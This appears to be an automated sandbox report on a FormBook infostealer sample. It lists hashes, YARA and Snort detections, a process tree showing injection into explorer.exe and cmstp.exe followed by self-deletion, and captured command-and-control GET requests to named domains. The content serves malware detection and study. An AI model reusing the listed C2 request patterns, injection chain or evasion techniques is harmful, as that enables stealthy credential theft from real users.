Loading ...

Play interactive tourEdit tour

Analysis Report 20210113432.exe

Overview

General Information

Sample Name:20210113432.exe
Analysis ID:339348
MD5:13dbc9c1c5a2811ecbee5f420c9c75b6
SHA1:6b01e540d3757944b61baa187159a908e170d5ae
SHA256:ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 20210113432.exe (PID: 1476 cmdline: 'C:\Users\user\Desktop\20210113432.exe' MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
    • 20210113432.exe (PID: 5320 cmdline: C:\Users\user\Desktop\20210113432.exe MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5300 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6292 cmdline: /c del 'C:\Users\user\Desktop\20210113432.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.20210113432.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.20210113432.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.20210113432.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.20210113432.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.20210113432.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5300, ProcessCommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', ProcessId: 6292

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: 20210113432.exeVirustotal: Detection: 28%Perma Link
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 20210113432.exeJoe Sandbox ML: detected
          Source: 2.2.20210113432.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.semaindustrial.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 20210113432.exeString found in binary or memory: http://tempuri.org/_391backDataSet.xsd
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.623532384.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859E80 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859E00 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_009251A1
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0093283A
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E1EB
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041D1F9
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E265
